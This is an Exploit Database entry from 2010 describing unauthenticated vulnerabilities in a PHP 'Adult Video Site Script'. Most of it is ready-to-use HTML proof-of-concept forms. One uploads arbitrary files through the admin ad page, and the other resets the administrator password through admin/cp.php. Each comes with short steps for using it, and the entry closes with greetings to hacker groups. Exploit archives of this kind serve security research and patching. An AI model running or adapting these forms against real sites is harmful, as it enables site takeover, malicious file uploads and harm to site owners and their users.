Adult Video Site Script – Multiple Vulnerabilities

• Exploit Database
• 35 阅读

• 作者： indoushka
  日期： 2010-03-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11825/

• ========================================================================================
  | # Title: ADULT VIDEO SITE SCRIPT Remote Upload Exploit
  | # Author : indoushka
  | # Home : www.dz-blackhat.com
  | # Tested on: Lunix Français v.(9.4 Ubuntu) 
  | # Bug: ADULT VIDEO SITE SCRIPT Remote Upload Exploit 
  ======================Exploit By indoushka =================================
   # Exploit: 
   
  <td valign="top" bgcolor="#FFFFFF"> <p>&nbsp;</p>
  <div align="center"> 
  <table width="80%" border="0" cellspacing="10" cellpadding="10" class="logintable1">
  <tr> 
  <td><font size="4" face="Verdana, Arial, Helvetica, sans-serif, Trebuchet MS">Add 
  ad Advertisement</font></td>
  </tr>
  <tr> 
  <td><div align="center"> <form enctype="multipart/form-data" action="http://127.0.0.1/videoscript/admin/addad.php" method="POST" >
  
  <table width="90%" border="0" cellspacing="4" cellpadding="4">
  <?php
  if($dfd)
  {
  echo "Ad Added Sucessfully";
  }?>
  <tr class="text"> 
  <td width="44%"><div align="right">Link:</div></td>
  <td width="56%"><input type="text" name="link" class="input"></td>
  </tr>
  <tr class="text"> 
  <td> <div align="right">Type:</div></td>
  <td><select name="type1">
  <option value="head">Head 728 x 90</option>
  <option value="title">Title 648 x 60</option>
  <option value="left">Left 120 x 600 </option>
  <option value="right">Right 120 x 600</option>
  </select></td>
  </tr>
  <tr class="text"> 
  <td> <div align="right">Image : </div></td>
  <td><INPUT TYPE=FILE NAME="file12"></td>
  </tr>
  <tr class="text"> 
  <td>&nbsp;</td>
  <td><input type="submit" name="Submit" value="Submit"></td>
  </tr>
  </table>
  </div></td>
  </tr></form>
  </table>
  <br>
  <table width="80%" border="0" cellspacing="10" cellpadding="10" class="logintable1">
  <tr> 
  </tr>
  <tr> 
  <td><div align="center"> 
  <table width="90%" border="0" cellspacing="0" cellpadding="1">
  
  2 - Save As .html
  
  3 - Go to http://127.0.0.1/videoscript/images/ad/ (2 find uploaded thing)
  
  
  <!-- 
  Change Admin Password
  -->
  
  
  ======================Exploit By indoushka =================================
   # Exploit: 
   
  <table width="80%" border="0" cellspacing="10" cellpadding="10" class="logintable1">
  <tr> 
  <td><font size="4" face="Verdana, Arial, Helvetica, sans-serif, Trebuchet MS">Change 
  Password </font></td>
  </tr>
  <tr> <form action="http://127.0.0.1/videoscript/admin/cp.php" method="POST">
  <td><div align="center"> 
  <table width="90%" border="0" cellspacing="4" cellpadding="4">
  <tr class="text"> 
  <td width="44%"><div align="right">New Password :</div></td>
  <td width="56%"><input type="password" name="npass" class="input"></td>
  </tr>
  <tr class="text"> 
  <td> <div align="right">New Password (Re-type): </div></td>
  <td><input type="password" name="npass1" class="input"></td>
  </tr>
  <tr class="text"> 
  <td>&nbsp;</td>
  <td><input type="submit" name="Submit" value="Submit"></td>
  </tr></form>
  <tr class="text"> 
  <td>&nbsp;</td>
  <td>&nbsp;</td>
  </tr>
  </table>
  
  2 - Save As .html
  
  3 - Go to http://127.0.0.1/videoscript/admin
   
  
   
  Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
  Greetz : 
  Exploit-db Team : 
  (loneferret+Exploits+dookie2000ca)
  all my friend :
  His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
  www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
  www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
  --------------------------------------------------------------------------------------------------------------